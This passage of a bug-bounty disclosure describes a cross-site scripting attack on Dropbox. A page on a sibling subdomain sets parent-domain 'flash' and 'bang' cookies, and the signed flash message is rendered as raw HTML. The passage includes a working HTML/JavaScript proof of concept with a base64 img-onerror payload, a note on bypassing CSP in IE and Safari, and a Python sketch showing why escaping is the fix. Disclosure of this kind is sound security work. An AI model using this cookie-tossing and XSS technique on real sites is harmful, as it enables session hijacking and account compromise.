However, although the page cannot directly read cookies on the main subdomain (www.dropbox.com), it can set any cookie on the parent domain (.dropbox.com). So a cookie set from dl-web.dropbox.com may be able to influence something on www.dropbox.com.
I found a nice feature, Flash. It is a pop-up message that appears for 1-2 seconds and is triggered by cookies. When the cookies “flash” and “bang” are present, it draws a small message box containing the text stored in the cookie “flash”, and checks the integrity of “flash” against the cookie “bang”. The “bang” looks like an HMAC of “flash”. So I need to find a correct “bang” value for my custom “flash”.
Now I can make a flash message with any text.
After uploading an HTML file that sets the malicious cookies obtained from the device unlink function, make the victim click your page. The flash message will appear and attack the victim when the victim opens a Dropbox web page.
```html
<script>
// "bang": the integrity tag obtained from the device unlink function
document.cookie="bang=QUFEZGthYS1CaTNfWUpYcDUwdjNxemVHSHlhSHJkU3BEdnhKRUxOZVZ3b2ZoUQ%3D%3D; Domain=dropbox.com; Path=/;";
// "flash": the message text that the flash box renders; set on the parent domain
document.cookie="flash=b2s6PGltZyBzcmM9eCBvbmVycm9yPWFsZXJ0KGRvY3VtZW50LmRvbWFpbik%2BIHVubGlua2VkIHN1Y2Nlc3NmdWxseS4%3D; Domain=dropbox.com; Path=/";
// send the victim to a Dropbox page so the flash message is displayed
location.href="https://dropbox.com/forgot";
</script>
```
There is a CSP, but the script can still be executed on IE or Safari.
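How the flash/bang check and the render step interact, as an added example that is not Dropbox's code (the key, the HMAC-SHA256 construction over the base64 flash value, and the cookie encoding are assumptions): a valid tag only proves that the server produced the message, not that the message is safe to drop into the page, so the text still has to be escaped when the box is rendered.

```python
import base64
import hashlib
import hmac
import html

# Hypothetical signing key and scheme: the real key and how "bang" is derived are not on the page.
SERVER_KEY = b"example-flash-signing-key"


def sign_flash(message: str) -> tuple[str, str]:
    """Return (flash, bang): base64 of the message and a base64 HMAC-SHA256 tag over it."""
    flash = base64.b64encode(message.encode()).decode()
    tag = hmac.new(SERVER_KEY, flash.encode(), hashlib.sha256).digest()
    return flash, base64.b64encode(tag).decode()


def verify_flash(flash: str, bang: str) -> bool:
    """Check that bang is a valid tag for flash: reject malformed base64, compare in constant time."""
    try:
        given = base64.b64decode(bang, validate=True)
    except ValueError:  # binascii.Error is a ValueError subclass
        return False
    expected = hmac.new(SERVER_KEY, flash.encode(), hashlib.sha256).digest()
    return hmac.compare_digest(expected, given)


def render_flash(flash: str, bang: str, escape: bool = True) -> str:
    """Return the HTML of the message box, or '' when the tag does not verify.

    escape=False reproduces the unsafe behaviour the post exploits: a validly
    signed message is written into the page as raw HTML.
    """
    if not verify_flash(flash, bang):
        return ""
    try:
        message = base64.b64decode(flash, validate=True).decode()
    except (ValueError, UnicodeDecodeError):
        return ""
    body = html.escape(message) if escape else message
    return f'<div class="flash">{body}</div>'


# Constructed input: a device name chosen by the attacker and signed by the
# unlink feature, which is how the post obtains a valid "bang" for a custom "flash".
DEVICE_NAME = "<img src=x onerror=alert(document.domain)>"
FLASH, BANG = sign_flash(f"ok:{DEVICE_NAME} unlinked successfully.")
```

Signing attacker-influenced text (here the device name) is the root of the issue: the check on "bang" passes, and only output escaping keeps the markup inert.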
2015/05/02: Fixed, with a bounty of $1,331.